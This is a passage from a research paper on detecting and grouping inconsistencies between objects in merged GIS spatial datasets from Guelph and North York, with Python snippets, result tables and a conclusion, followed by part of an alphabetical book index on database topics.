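    ordered = sorted(ipr_count, key=lambda o: (elasticity[o], ipr_count[o]), reverse=True)
    eigs = []
    for pos, first in enumerate(ordered):
        rest = ordered[pos + 1:]          # objects with the same or smaller elasticity
        current = set()
        for pair in iprs:
            if first in pair:
                second = next(iter(pair - {first}))
                if second in rest:        # group partners around the higher-elasticity object
                    current |= {first, second}
        if current:
            eigs.append(current)
    return eigs

iprs = [frozenset(("i", "j")), frozenset(("i", "k"))]
els = {"i": 1.0, "j": 1 / 6, "k": 1 / 4}
print(form_eigs(iprs, els))               # -> [{'i', 'j', 'k'}], i.e. EIGijk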
EXAMPLE RESULTS Experiments were conducted on GIS data from a number of public and private sector organizations. These geographic information systems consist of a cross section of utility infrastructure, commercial, land and taxation data. A distinction is made between source data sets (SDS), which are the GIS databases analyzed in
this research, and experimental data sets (EDS), which are subsets of one or more SDS on which the experiments were conducted. SDS is discussed in 5.1 and EDS are presented in Section 5.2.
Source Data Sets (SDS) Each SDS examined in this research consists of numerous layers of raw spatial data built and maintained by highly-qualified and experienced people engaged in commercial applications. Three of these SDS are discussed in this section. They are listed in Table 1.
Experimental Data Sets (EDS) Experimental data sets were created from the source data sets and used throughout this research. This section describes two such EDS that were constructed from the three SDS described in the previous section. The first EDS, denoted EDS-1, was created by selecting a number of layers of SDS-1 in a geographic region, while the second EDS, denoted EDS-2 was formed by combining selected layers from SDS-2 and SDS-3 in a geographic region.
Table 1. Source data sets (SDS) SDS Geographic Coverage of Data Set ID SDS-1 Guelph SDS-2 Toronto (North York) SDS-3 Toronto (North York)
Data Source City of Guelph, Canada Teranet Inc., Canada North York Municipal Offices, Canada
Table 2. Experimental data set EDS-1 EDS ID Geographic Coverage Number of Objects Layer ID 1 2 3 4
EDS-1 0.5 km by 0.6 km of Guelph. 749 Layers Source Number of Layer Description SDS Objects Residence. SDS-1 202 Shed. SDS-1 65 Property. SDS-1 201 Tree. SDS-1 281
Figure 9. EDS 1
Table 3. Experimental data set EDS-2 EDS ID Geographic Coverage Number of Objects Layer ID 1 2 3 4 5
EDS-2 5100 ft by 5700 ft segment of North York. 9653 Layers Source Layer Description Number of Objects SDS Road. SDS-2 112 Property. SDS-2 3437 Building. SDS-3 4991 Water Pipe Junction. SDS-3 609 Sewer Manhole. SDS-3 504
Table 4. IPRs in EDS-1
Layer Residence Shed Tree Shed Tree Tree
Property
Overlap
18
Property Residence Shed Tree Property
Overlap Overlap Overlap Overlap Overlap
10 4 2 6 1
M-Rule violated M-4 M-15
EDS-1 Number of IPRs based on Automatically Observed Relation
Observed Relation Layer Relation
Number of IPRs based on Stationary M-Rules which were violated
Nature of Violation 2 sheds in property 2 residences in property
4 2
Table 5. IPRs in EDS-2
Layer Building Building Building Sewer Sewer Sewer Water Water Water
Observed Relation Layer Building Property Road Road Property Building Road Property Building
M-Rule violated M-12 M-12 M-12
EDS-2 Number of IPRs based on Automatically Observed Relation Relation Overlap Overlap Overlap Overlap Overlap Overlap Overlap Overlap Overlap
27 142 56 11 11 10 20 20 16 Number of IPRs based on Stationary M-Rules which were violated
Table 6. IPR summary
EDS-1 EDS-2
Total IPRs 47 346
Number of Objects 749 9653
IPR as Percent of Objects 6.27% 3.58%
Table 7. Classification of EIGs in EDS-1 EDS-1
2 8 3 4
Number of EIGs Detected by Visual Inspection 2 8 3 4
2
2
1 3
1 3
1
1
4 2
4 2
Number of EIGs Automatically Detected
Semantic Description of EIG A Residence overlaps with one Property. A Residence overlaps with more then one Property. A Shed overlaps with more then one Property. A Tree overlaps with a Residence. A Shed inside one property overlaps with a second Shed. The second Shed overlaps two properties. (Show drawing here). A Tree overlaps with more then one other Tree. A Tree overlaps with one Tree. A Tree overlaps with a Residence, and also with another Tree A property contains two Sheds. A property contains two Residences.
The first experimental data set EDS-1 covers a portion of Guelph, Ontario, Canada and is discussed in Table 2. The data in EDS-1 is shown graphically in Figure 9. The second data set listed in Table 3 comprises of a portion of North York, which was created by combining data from two GIS databases, and adjusting them to common control points. The data in EDS-2 is shown graphically in Figure 10.
The number of IPRs detected based on automatically observed relations that do not correspond to P-Rules or M-Rules are described in the first part of Table 4 and Table 5 for EDS-1 and EDS-2 respectively. Those automatically observed relations that correspond to M-Rules but have a frequency that is either smaller than the lower bound or larger than the upper bound of the M-Rules, are presented in the second part of these tables.
Table 8. Classification of EIGs in EDS-2
Semantic Description of EIG | Number of EIGs Automatically Detected | Number of EIGs Detected by Visual Inspection
Two buildings inside one property overlap one another. | 14 | 14
Two buildings overlap one another; one of the buildings is inside a property, and the other overlaps this same property as well as an adjoining property. | 9 | 9
A building overlaps two properties. | 34 | 34
A building overlaps a property, a second building inside the same property, as well as the adjoining road. | 4 | 4
A building overlaps a property as well as the adjoining road. | 26 | 26
A Sewer overlaps a road and the adjoining property. | 7 | 7
A Building overlaps a property and an adjoining road, as well as a Sewer that overlaps the same road and property. | 4 | 4
A building overlaps a property and an adjoining road, and a sewer is inside the property. | 6 | 6
A Water Pipe Junction overlaps a road and the adjoining property. | 13 | 13
A Building overlaps a property and an adjoining road, as well as a Water Pipe Junction that overlaps the same road and property. | 7 | 7
A building overlaps a property and an adjoining road, and a Water Pipe Junction is inside the property. | 9 | 9
A property contains three buildings. | 24 | 24
A property contains four buildings. | 4 | 4
A property contains five buildings. | 5 | 5
Table 9. EIG analysis for EDS-1
Layer     | Number of EIGs whose Highest Elasticity Object is on the Layer | Percent of Total EIGs
Residence | 12 | 40%
Shed      | 9  | 30%
Property  | 0  | 0%
Tree      | 9  | 30%
Figure 10. EDS-2
Table 10. EIG analysis for EDS-2
Layer    | Number of EIGs whose Highest Elasticity Object is on the Layer | Percent of Total EIGs
Road     | 0   | 0%
Property | 0   | 0%
Building | 135 | 81.32%
Water    | 20  | 12.04%
Sewer    | 11  | 6.62%
Table 11. EIG summary
      | Total EIGs | Number of Objects | EIGs as Percent of Objects
EDS-1 | 30         | 749               | 4.01%
EDS-2 | 166        | 9653              | 1.72%
Table 12. Percent of objects in EIGs
      | Number of Objects | Number of Objects in EIGs | Percent of Objects in EIGs
EDS-1 | 749               | 68                        | 9.07%
EDS-2 | 9653              | 467                       | 4.83%
The number of IPRs detected in each EDS is listed in Table 6. The EIGs detected by grouping IPRs based on their semantic structure are listed in Table 7 and Table 8 for EDS-1 and EDS-2 respectively, along with the number of such EIGs formed. The types of objects with the highest elasticity in the EIGs are summarized in Table 9 and Table 10 for EDS-1 and EDS-2 respectively. The number of EIGs detected in each EDS is listed in Table 11. The number of objects in EIGs, and the percentage of all objects in each EDS that belong to EIGs, are listed in Table 12.
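The percentages reported in Tables 6, 11, and 12 follow directly from these counts. The short check below recomputes them from the table values; the recomputed figures match the published ones up to differences of 0.01 in the last digit due to rounding.

```python
# Recomputing the ratios reported in Tables 6, 11 and 12 from the counts above.
counts = {
    "EDS-1": {"objects": 749,  "iprs": 47,  "eigs": 30,  "objects_in_eigs": 68},
    "EDS-2": {"objects": 9653, "iprs": 346, "eigs": 166, "objects_in_eigs": 467},
}

for eds, c in counts.items():
    n = c["objects"]
    print(f'{eds}: IPRs = {100 * c["iprs"] / n:.2f}% of objects, '
          f'EIGs = {100 * c["eigs"] / n:.2f}% of objects, '
          f'objects in EIGs = {100 * c["objects_in_eigs"] / n:.2f}%')
```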
DISCUSSION The IPRs in EDS-1 listed in Table 4 indicate isolated incidents of IPRs of different types in very small quantities. The same situation is seen in the types of EIGs detected in Table 7. The only exception is the number of residences that overlap with more than one property, which suggests a possible pattern of inconsistent behavior depending on their proximity. Such a pattern, if it exists, would not be extensive, and there is therefore no need to cluster EDS-1 or apply a regional strategy to this data set. The IPRs in EDS-2 listed in Table 5 and the corresponding EIGs in Table 8 indicate an appreciable number of inconsistencies involving
buildings, and to a lesser extent inconsistencies involving sewers and water pipe junctions. This is demonstrated in Table 10, which shows that 135 buildings require adjustment, as do 20 water pipe junctions and 11 sewer manholes. The same table shows that over 81 percent of the inconsistencies are due to building objects, with about 12 percent and 7 percent due to water pipe junctions and sewer manholes respectively. The building layer in EDS-2, which originates from aerial photography, is a likely cause of a significant number of the inconsistencies in EDS-2. Both EDS-1 and EDS-2 were visually inspected for inconsistencies, and all inconsistencies found during the visual inspection were also automatically detected as EIGs, as seen in Table 7 and Table 8. A measure of consistency of spatial data is proposed in terms of the number of EIGs, as shown in Table 11, and in terms of the number of objects in EIGs, as shown in Table 12. Both tables show that although EDS-2 has more than five times as many EIGs as EDS-1, EDS-1 is roughly twice as inconsistent relative to its size as EDS-2. It therefore appears that the merger of SDS-2 and SDS-3 to form EDS-2 produced consistency levels higher than those of EDS-1.
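The comparison in the preceding paragraph can be checked directly against Tables 11 and 12; the lines below are simple ratios of the reported values and involve no data beyond those tables.

```python
# Ratios behind the comparison above, computed from Tables 11 and 12.
eig_count_ratio = 166 / 30                      # EDS-2 has ~5.5 times as many EIGs as EDS-1
eig_density_ratio = (30 / 749) / (166 / 9653)   # EDS-1 has ~2.3 times as many EIGs per object
objects_in_eigs_ratio = 9.07 / 4.83             # ~1.9 times by share of objects in EIGs
print(round(eig_count_ratio, 2), round(eig_density_ratio, 2), round(objects_in_eigs_ratio, 2))
```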
CONCLUSION A method for detecting inconsistencies between pairs of objects, or IPRs, based on a comparison of observed relations against P-Rules and M-Rules was presented. Elasticity, a property of objects, was introduced to capture the relative contribution of objects to IPRs. Elasticity was then used to group IPRs into multi-object structures, called EIGs, which correspond to inconsistencies among multiple neighboring entities in the real world. The relative contribution of objects within EIGs was established using elasticity and will be applied to the EIG adjustment process in future publications.
With inconsistent behavior in spatial databases now systematically formulated, the regional aspects of some inconsistencies can be captured by clustering EIGs. Future work is expected to discuss how elasticity and clustering techniques are used to find local and global solutions to EIGs. Organizations in all business sectors increasingly integrate spatial data with their existing non-spatial data sets, so the quality of spatial data integration is becoming critical to the integration of a growing number of non-spatial databases. Integrating spatial databases in a way that minimizes inconsistencies in the combined data set also minimizes inconsistencies when the non-spatial data sets linked to those spatial databases are combined. Knowledge discovery in the combined non-spatial databases is therefore likely to produce higher-quality results.
This work was previously published in the International Journal of Knowledge Management, edited by M. Jennex, Volume 4, Issue 3, pp. 64-81, copyright 2008 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
Volume I, pp. 1-677 • Volume II, 678-1356 • Volume III, 1357-2010 • Volume IV, 2011-2705
Index
applications grid 1934 apriori algorithm 65 , 2661, 2669 AR (association rules) 517 AR mining 505, 518 AR mining task 512 Ara Irititja Project, The 1462, 1463 Ara Irititja software 1465 archaeological data 1420 archaeological excavation database 1437 archaeological excavations, introduction to 1421 architecture 1372, 1374, 1375 archive databases 1462 ARIADNE (Alliance of Remote Instructional Authoring and Distribution Networks for Europe) 365, 372, 379 arithmetic coding 199 ARPANET (Advanced Research Projects Agency Network) 2109, 2116 arrival pattern 1023, 1024 arrival pattern of transactions 1024 artificial intelligence (AI) 341, 1202 artificial neural network (ANN) 2659 ASSO 441 ARs (association rules) 394, 1320, 2192, 2193, 2194, 2195, 2199, 2201, 2202, 2203, 2545, 2657, 2658, 2659, 2675, 2679, 2680, 2681, 2682, 2683 AR hiding 2273 AR hiding methods 2268 AR mining (ARM) 2660, 2661, 2662, 2680, 2681, 2683 AR based techniques 389 asynchronous collaborative discussion environment 1578 asynchronous collaborative discussion system 1577 asynchronous communication 1681 ATM (automatic teller machine) systems 1754 ATNS (Agreements Treaties and Negotiated Settlements)
database 1472 ATNS database, searching 1474 ATNS home page 1474 atomicity 29, 209, 1024 atomicity and isolation (A/I) 1260 attacker 2122 attribute inheritance 445 attribute order dependence 2225, 2229 attributes 394, 2000, 2001, 2002, 2004, 2005, 2006, 2008 audit trail 1882, 2095 audit-based expanded query set size control 2105 Australia, Central 1462 Australia, Central Land Council 1464 Australia, remote 1462 Australia, remote indigenous 1462 Australia, South 1463 Australia, Western 1464 Australian Bureau of Statistics 1468 authentication authorization 2114 automated individual decisions 2092 automatic authorship identification 2131 automatic failover 1916 automatic generation of maps 1576 automating process 1903 autonomous organizations 1447 availability 2108
B B formal method 1168 B Method, overview of 1169 B Method, the 440 B specifications 1173 B specifications, correctness of 1175 B translation 1173 B2B e-commerce 341, 1985 balanced partition 199 bandwidth, low 662 Bank of Jordan 1742 base station (BS) 1262 base64 1381, 1383 basic logic formalism 261 basic sign-off 1263 Bayesian network (BN) 2011
behavioral refinement 441, 452 benchmarks 1232 benchmarks, decision-support 1228 best practices 1292 best-first search 2021 bibliomining 335–336 Big Brother metaphor 1813 binary classification problem 309 binary large objects (BLOBs) 67 binary representation 2158 bioinformatics 794, 1267–1275, 2658, 2683 biological macromolecules 2632 BIOME 379 biomedical informatics 1382 biometric information 1512, 1520–1521 bipolar queries 154 bitmap join indices (BJIs) 2292, 2296, 2297, 2299 bitmaps 197, 2014 Blackboard® 373 blogs (Web logs) 1412–1413 Blue Web’n 379 Boolean attributes 2014 bounded sum 2178 bounded-choice substitution 443 Brazilian health system, the 988 breadth-first (BFS) 2646 Breiman observation 2004 broadcasting 1110, 1115, 1117, 1118, 1124, 1125 Broome 1464 bucket-based histogram 2050 bug assignment 819, 820 bug fixing practices 797 bug-fixing process 805 business environment 940 business information integration 1959 business intelligence 941 business performance management (BPM) 27 business process offshoring (BPO) 1492, 1493, 1494, 1496, 1502, 1505, 1506, 1507 business process re-engineering (BPR) 1949 business rule 219 business systems purpose analysis (BSPA) 1943 business value 866
C caching 1119, 1120, 1121, 1124, 1125 calculation aggregation 1245 Caldicott principles 2095 Canada’s SchoolNet 379 canonical database 2054 CAPDM Sample Interactive LOS 379 cardinalities 2493, 2496 cardinality relationships 2506 CAREO (Campus Alberta Repository for Educational Objects) 365, 379 cascaded star model 656 causal rejection principle 2262, 2267 CBIR (content-based image retrieval) 1189, 1191, 1192, 1195, 1198, 1202 CBIR systems 1189 CBIR systems, color 1198 CBIR systems, initial query 1195 CBIR systems, texture 1198 CBIR, feature analysis and similarity measures 1191 CELEBRATE network 372 cell-level security (CLS) 1669 central processing unit (CPU) 485 centralised database 1468 changes temporal index (CTI) 402 check-out mode 1263 child nodes 207 Chow-Liu trees 2019 CIA 2108 CIMOSA 343 CIMSs (collaborative information management systems) 1446, 1447 CIMSs-proposed solution 1449 CITIDEL 379 city and regional planning/engineering 1754 civil infrastructure status (CIS) 1498 classes 2001 class constraints 446 class-based measures 2637 classification 1320, 2001, 2002, 2004, 2009, 2164 classification problems 2001 classifier 394, 2001
clickstream data 1785 CLOE (Co-operative Learning Object Exchange) 379 clustered model 1259 clustering 49, 394, 1912, 1923, 2000, 2002, 2007, 2008, 2642 clustering techniques 1553 COBOL programming language 206, 208 CODASYL (Conference on Data Systems Languages) 206 Codd, E. F. 206 code of ethics 2084 collaboration 1446 collaboration, need for 1446 collaborative discussion 1576 collaborative networks 1453 color coding scheme 1573 combination-based scheme 2234–2235 commit phase 1989 common data model (CDM) 2473 common gateway interface (CGI) 1575 common practice notation (CPN) view 39 community development 1684 compatibility function 1024 compensating mode 1259 compiled data, anonymisation of 2093 compiled records, tightly controlled use 2093 complex data 648, 649, 650, 651, 657 complexity 2001 compliance check 1796 compressed string structures 199 compressed suffix arrays 199 computational complexity 2556 computational techniques 2001 computer integrated manufacturing (CIM) 338 computer networking 1454 computer networking in cybercafes in Nigeria, data collection 1456 computer networks 1460 computer science teaching center (CSTC) 379 computer security community 2079
computer-aided design 339 computer-aided manufacturing 339 computer-aided process planning 339 computer-based information technology 339 computerized patient record system (CPRS) 486 computer-mediated communication (CMC) 1670 computing paradigm, client-serverbased 485 computing queries 2052 computing tabulating recording (CTR) company 205 conceptual data models 106, 339, 344, 350 conceptual data models, development of 350 conceptual defined sequence 684, 685, 686 conceptual design 98, 346 conceptual modeling 87, 529, 1009, 1010, 1581 conceptual schema 441 concrete motifs 2635 concurrency control 1024 concurrent engineering (CE) 338 condensed representation 2055 confidentiality 186, 2108 Connexions 379 consistency 209, 449, 1024 consistent database 2057 constellation 963, 967 constitutional empowerment 1823 constraint databases 348 constraint-based algorithm 1205 constraint-based multi-dimensional databases 961 constraints 212, 963, 968 constraints, application 446 constraints, explicit 446 constraints, implicit 445 construct definitions 1305 construction cost 521 constructivism 1313 constructs 1445 containment 2060, 2062, 2070 content-based music information retrieval (CBMIR) 36 context 579
context objects in spans (CoinS) 1411 context-aware query processing 1844 context-aware service-oriented computing 1864 contextual IQ criteria 2146 contiguous frequent itemsets 2196–2197 continuous availability 1899, 1907 continuous post-deployment communication 1756 continuous quality improvement (CQI) 1349 control system design 2567 control theory 2565, 2566, 2567, 2569, 2570 control-based database tuning 2564 controllability and observability 2570 conventional database system 1021 conventional music notation (CMN) 39 conventional queries 996 convergence 93 convergence rate 2570 cookie poisoning 2127 cookies 2081, 2084, 2113, 2116 coordinate system 1754 coordination theory application 805 copyright 1466 CORBA (common object request broker architecture) 873 CORDRA (content object repository discovery and registration/resolution architecture) 372 corpus 2358 correctness 839 correlation techniques 390 correspondence assertions 2485 cost estimation 2001 cost formula 2546 cost model 660, 669 count aggregation 1245 COUNTER (Counting Online Usage of Networked Electronic Resources) 323–327 coupling, close 787
D daily production 941 data 1754, 2313, 2322 data access 1832–1843 data access agent (DAA) 1258 data access type 1024 data accessibility 1575 data analysis 1763 data and schema conflict resolution strategies 1729 data cleaning 240, 2245–2260 data collection 1762 data collection, method of 1456 data collections, MEDLINE 492, 499 data communication cost (DC) 669 data controllers 2089, 2090, 2091, 2092, 2093, 2094 data cubes, histo-based compression 165–178 data definition language (DDL) 986 data exchange and share 339 data glove 1160 data identicle tuples 2285 data integration 2058 data integration options 1726 data integrity 209 data manipulation 1568 data manipulation language (DML) 986 data mart, handling data changes in 226 data mart, handling schema changes in 229 data marts 222 data models 414, 416, 417, 418, 419, 425, 429, 430, 435, 436, 437, 438, 1003 data models and VQLs 1009 data models, object-relational (OR) 419, 425 data models, flat file 207
data models, hierarchical 207, 211 data models, network 208, 211 data models, relational 208, 211 data online 1839–1843 data partitioning 834, 2292 data perturbation 2268 data perturbation, illustration of 190 data perturbation, security and accuracy 189 data preparation 2002 data pre-processing techniques 2037 data properties 1023 data protection act 2088, 2089, 2093, 2094, 2096, 2098 data protection concern 2085 data protection legislation 2088 data quality 1788 data refinement 441 data replication 834 data sanitization 2273 data selection cost 521 data services infrastructure 1727 data source creation 695 data sources 222 data sources for mining 941 data stream pre-processing 2050 data structure refinement 1179 data structures, semantics of 259 data subjects 1822, 2090 data swapping 2106 data tabular 1839–1843 data transformation 386 data user 1833–1843 data visualization 1152, 1568, 1570 data, collection and storage of 942 data, freshness of 840 data, mapping 2471 data-centric approach 2349, 2350, 2354 DataCube (DC) 2013, 2024 data-integration approaches 2473 data-mining technique 2543 datasets 2001, 2002, 2004, 2005, 2006, 2007, 2008 dataveillance 1808, 1822 Daubechies wavelet 1198 DBs (databases) 207, 211, 1236, 1239, 1240, 1290, 1292, 1460, 1823–1843, 2079, 2084, 2116, 2313, 2314, 2620
DB2 (database 2 universal database) 349, 486, 2142 DBs, abstract 1873 DB administrators (DBAs) 210, 1665, 1669, 2127, 2473, 2564 DB, adults 2555 DB, adults, transaction set for 2562 DB applications, tool for building 1168 DB application system implementer and manager (DASIM) 1283 DB benchmarking 1226, 1233 DB benchmarking, issues 1229 DB benchmarking, tradeoffs 1229 DB binary representation 2165 DB, catalog 2450, 2471 DB clustering 161 DB conceptual schemas 440 DB design 441, 538, 1362 DB design, physical 847, 850 DB, distributed 1919 DBs, distributed and heterogeneous 1447 DB-driven application assignment engine (DATE) 1284 DB-driven portal application 1283 DBs, dynamically linking to ontologies 909 DBs, federated 1453 DBs, federated, architecture 1448 DBs, full-text 1874 DBs, history of 1687 DBs, inductive 1321 DB integration 282, 303, 1928 DB integrity checking 212 DB-like technologies 206 DBs, literature search, online 1874 DB management 1687 DB management systems (DBMSs) 14, 205, 639, 725, 848, 1003, 1021, 1233, 1501, 1667, 1682, 1754, 1959, 2101, 2119, 2127, 2140, 2141 DBMSs customers, roles of 2144 DBMSs, quality of 2145 DB modeling of engineering information 338 DB models 106, 207, 344, 1233 DB models, constructions of 349
DBs, national medical 2085, 2086, 2087, 2088, 2090, 2091, 2092, 2093, 2095, 2096, 2097 DB, natural language 2130 DBs, online library 1867 DBs, online, misuse of 1867, 1867–1875 DBs, ontological support for 911 DB operating cost reduction 2556 DB operations, taxonomy of 1240 DB partitioning 1263, 2547 DBs, project, global characterization of 2000 DB protection countermeasures, application-level 2081 DB protection countermeasures, host level 2081 DB protection countermeasures, network level 2080 DB protection countermeasures, physical and insider 2082 DB queries 1238 DB reconstruction 2273 DB repair 2058 DB sanitization problem 2269 DB schemas 1322, 2349, 2448, 2450, 2453, 2454, 2456, 2457, 2464, 2465, 2470 DB schema interoperability 909 DB schema model 441 DB security 2100 DB server 2084, 2116 DB skills 208 DBs, spatial 396 DBs, spatio-temporal 396 DB-specific issues 2567 DBs, standby 1914 DB state 1322 DB systems (DBSs) 339, 2473 DBSs, heterogeneous 1863 DBSs, intelligent 725 DBs, temporal 223 DB transactions 446 DB transformation 2055 DBs, transient 223 DB tuning 2299 deadline 1022, 1023, 1025, 1031, 1035 decentralized hospital computer program (DHCP) 486 decision process 615
decision support systems, spatial (SDSSs) 787 decision trees 941, 2002, 2003, 2009 decision trees as DM method 949 decision trees, C4.5 2002, 2009 decision trees, CART (classification and regression trees) 2002 decision trees, ID3 2002 decision trees, M5 2001, 2002, 2003, 2004, 2007, 2008 decision trees, M5 algorithm 2002 decision trees, M5, construction of 2003 decisional model 99 decision-making processes 648, 655 decison trees, M5P algorithm 2001, 2002, 2007, 2008 declarative vs. procedural 219 decoding 2338 decoding time 2339 deduction 727 deduction, probabilistic 727 defense projects, Cold War era 206 delay freshness 840 Delta State, Nigeria 1454, 1455 DeltaVista 1796 democratic accountability 1823, 1823–1843 denial-of-service (DoS) attacks 385 Department of Homeland Security (DHS) 1514, 1516, 1517–1518 dependencies, discontinuous 745 deployment issues 1468 depth-first manner (DFS) 2646 descriptive attribute 93 design process, security integration 638 design/CPN tools 1026 desktop database 893 desktop file system 207 determined cardinality references 2506 determined data semantics 2506 deterministic motif mining 2632 deterministic motifs 2635 development characteristics 2005
DHHS (Department of Health and Human Services) 502 diffusion of innovations 2574 digital computers 206 digital computers, development of 206 digital dossier 1822 digital imaging and communication in medicine (DICOM) 1373 digital information 2616 digital kinship database 956 digital learning object repositories specification 372 Digital Library for Earth System Education 379 digital library, SMETE (science, mathematics, engineering, and technology education) 365 digital manipulatives 900 digital map 1754 digital object identifier (DOI) 1406–1407 digital rights management (DRM) 374 digital satellite images 1754 Digital Scriptorium 380 Digital Think 365 digitation 1754 dimension attribute 91 dimension instances 964 dimensional fact model (DFM) 88 dimensions 962 Dioxin database 2055 directory traversal attack, definition 2127 Dirichlet priors 2019 disaster recovery 1902 disclosure limitation 1823–1843 DiscoveryLink 486 DiscoveryLink, DataJoiner 486 discretionary access control (DAC) 2101, 2102, 2108 discriminant analysis 2169 discrimination networks 728 discussion artifact 1578 disjoint sets 2307 disjunctive datalog program 2058 disjunctive program 2055 display operator 972 disruptive technology 2573
distributed association rule mining 160 distributed classification and regression 158 distributed data mining 157–164 distributed software development 799 DL (description logics) 269, 2362, 2367, 2376, 2382, 2383 DL languages, semantics of 271 DL-Lite, expressiveness 274 DL-Lite, performance with 274 DM (data mining) 36, 240, 334–335, 343, 394, 943, 944, 1152, 1779, 1785, 1822, 2000, 2001, 2002, 2006, 2008, 2012, 2016, 2130, 2164, 2170, 2268, 2641, 2652, 2653 DM activities 948 DM algorithms 941 DM applications 943, 944 DM, as a metaphor 1812 DM, collective framework (CDM) 159 DM ethics 1808 DM ethics, metaphors and models for 1808–1822 DM in manufacturing 944 DM information 941 DM medical databases 1393–1404 DM results 947 DM techniques 944 DM techniques and tools 941 DM, visual (VDM) 1152 document clustering (DC) 933 document object model (DOM) 529 document type definitions (DTDs) 1321, 1383 document-centric documents 347 document-constructor model 2485 domain constraints 213 domain environment 575 domain relational calculus (DRC) 137 downtime 941 drill-down operators 963, 976 drug activity prediction problem 1193 DSpace™ (MIT) 380 DTD (Document Type Definition) 530, 2506
DTD for structured papers 531 DTD-graph mechanism 2061 Dublin Core metadata standard 372 durability 209, 1024 DWs (data warehouses) 86, 222, 241, 571, 637, 658, 847, 2048, 2108, 2324 DW backstage 847 DW design 86 DWs, handling changes in 224 DWs, node-partitioned (NPDWs) 658, 659 DWs, requirements of 576 DW security and access control models 639 DW systems 222 DWs, temporal, design of 233 DWs, temporal, survey on 221 dynamic generation of maps 1575 dynamic hierarchies 96 dynamic multidimensional histograms 172 dynamic one-dimensional histograms 169 dynamic weights 141 dynamic workloads 2564 Dynapi 820
E EACH 2479 eager replication 30 early-repearing 2055 earth geography history 395 ease of use 1873 ebXML core components 1990– 1992 e-commerce (electronic commerce) 1786 economic development 1682, 1683 economic development, differing from IT 1682 economics of technology standards 2574, 2575, 2586 edge-counting algorithm 494 EdNA (Education Network Australia) Online 365, 372, 380 EducaNext (UNIVERSAL) 380 education, 3-D virtual worlds 2595
educational objects economy (EOE) 380 eduSource 372 effective knowledge organization (EKO) 1638, 1639, 1648 EFLWOR expressions 2477 EFLWOR-expression syntax 2478 e-health 484 e-healthcare systems 492 EIGs (elasticity-based IPR groupings) 2693, 2694 EIGs, detecting 2694 EIGs, example of 2694 EIGs, schematic view of 2695 Eisenhower National Clearinghouse for Mathematics and Science Education 380 elasticity 2685 elasticity, characteristics of 2692 elasticity, example of 2693 elasticity-based groupings 2687 elders 1467 electronic data interchange (EDI) 528 electronic health record (EHR) 485, 1386 electronic patient record (EPR) 1386 Electronic Privacy Information Center (EPIC) 1517, 1527 electronic statistics, development of 321 electronic statistics, management of 326 electronic statistics, use of 327 electronic usage statistics 320 element-based scheme 2234 eLera (e-Learning Research and Assessment Network) 380 EM (expectation maximization), analysis of 1564 EM clusters (individual colours) 1560 EM clusters (RGB) 1563 e-manufacturing 354 emergence index 180 emergence index in image databases 179–185 emergence, model of 180 emergency medical services (EMS) 1344 emergency medical technicians (EMTs) 1345
flat file 207, 211 flexibility 866, 871 flexible entity resolution architecture 2248 flexible gap motifs 2635 floating IP addresses 1914 FLOSS (free, libre, and open source) software 797, 2301 FLOSS data 2303 FLOSS development, coordination in 804 FLOSS phenomenon 800 FLOSS projects 2301 FLOSS, conceptual development 800 FLOSS, discussion 821 FLOSS, findings 813 FLOSS, research methodology 807 flow measures 97 FNF2 data model 2277, 2281, 2283 FNF2 fuzzy relation schema 2284 FNF2 fuzzy tuple 2283 FNF2, image retrieval application of 2288 forecasting 2001 Foreign Intelligence Surveillance Act (FISA) 1521 foreign key (FK) 1427 foreign key constraints 213 forensics, applications to 1565 formal competency questions 2387, 2388, 2398, 2399 formalism 214 FPOB hybrid 128 FQUERY 143, 152 fragile watermarking 2228 fragmentation attribute 2299 free and open source software (FOSS) 2572, 2573, 2574, 2576, 2577, 2578, 2579, 2580, 2581, 2583, 2584, 2585, 2586, 2587–2590, 2591 frequency-based matching 2307 frequent itemset hiding 2273 frequent one-sum weighted itemsets 2669 frequent pattern growth tree (FPT) 1051 freshness index by data deviation 840
FTS (full-text search) 933 FTS engine 938 FTS engine interface 935 FTS engine, structure of 934 FULL 2479 full elasticity 2693 full replicas (FRs) 673 full-text indices 198 fully partitioned replicas (FPRs) 674 function approximation 1107 function points 2002 functional data model 1012 fusion places 1026 fuzzy association rules, and distributed mining 2435 fuzzy association rules, and mining 2427–2447 fuzzy attribute 2284 fuzzy clustering 2173, 2176 fuzzy complementation 2284 fuzzy comprehensive method, and apparel comfort 2177 fuzzy conceptual data modeling 106 fuzzy data 2448, 2450, 2454, 2455, 2457, 2458, 2459, 2463, 2464, 2466, 2470, 2471 fuzzy databases 348, 2448, 2450, 2455, 2456, 2459, 2462, 2463, 2464, 2466 fuzzy database management systems 2466, 2471 fuzzy databases, similarity relation-based 146 fuzzy image database (FIB) 2288 fuzzy intersection 2284 fuzzy linear clustering 2166, 2173 fuzzy logic 105, 341, 1495–1496, 1502, 1505, 1506, 1507, 1509, 1510, 2159, 2165 fuzzy logical database modeling 106 fuzzy matching 938 fuzzy metaknowledge base (FMB) 2455 fuzzy object-oriented data models 127 fuzzy pairs 2287 fuzzy possibilistic relational database 145
fuzzy predicates 143, 150 fuzzy preferences, between query conditions 141 fuzzy preferences, inside query conditions 140 fuzzy querying, of fuzzy relational databases 144 fuzzy querying, protoforms 1040 fuzzy search 1800 fuzzy searching and Arabic/Asian names 1802 fuzzy set theory 342 fuzzy sets 107, 1133, 1137, 1138, 2165 fuzzy sets, and neural networks 2169 fuzzy similarity calculation 2161 fuzzy similarity representation 2160 fuzzy similarity representation, model for 2160 fuzzy union 2284
G Gaim 820 gap constraint 2636 Gateway to Educational Materials (SM) (GEM) Consortium 380 GDP value 207 GEFRED 146 gene analysis 2642 genealogy 956 General Electric 206 general public license (GPL) 888 generalized additive perturbation process (GADP) 189 generalized substitution language (GSL) 443 genetic algorithm 2021 genomics research network architecture (gRNA) 1269 geographic data mining 791 geographic ontology 2410 geographic position coordinates 1570 Geomedia software 1741 geo-ontology 2405–2426 GeoSensors 790 geospatial component 785, 786, 787, 790 geospatial data layers 1749
